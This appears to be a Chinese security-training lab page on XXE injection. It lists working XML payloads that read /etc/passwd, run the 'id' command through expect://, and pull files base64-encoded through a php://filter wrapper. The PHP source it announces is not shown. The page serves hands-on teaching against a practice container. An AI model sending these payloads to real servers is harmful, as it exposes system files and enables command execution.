XXE漏洞一

本页面漏洞需要开启docker容器并开启apache服务,默认已经开启,如果有问题请联系管理员必火,微信:bihuoceo
接收端PHP源码如下:
漏洞利用代码如下:
<?xml version="1.0" encoding="utf-8"?>
<name>
kuaishouduhailaonainren
</name>
漏洞利用代码2(读取/etc/passwd)如下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds[ <!ENTITY goodies SYSTEM "file:///etc/passwd">]> <creds>
&goodies;
</creds>
漏洞利用代码3(命令执行)如下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds[ <!ENTITY goodies SYSTEM "expect://id">]> <creds>
&goodies;
</creds>
漏洞利用代码4(特殊字符读取,会报错)如下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds[ <!ENTITY goodies SYSTEM "file:///var/www/html/xxe/1.txt">]> <creds>
&goodies;
</creds>
漏洞利用代码5(base64编码读取,避免报错)如下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds[ <!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/2.txt">]> <creds>
&goodies;
</creds>
© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2  
本站一切信息皆遵守中华人民共和国法律,如发现任何不良信息,请拨打电话:18622800700
网络安全培训、企业合作、院校合作: 15320004362(手机同微信)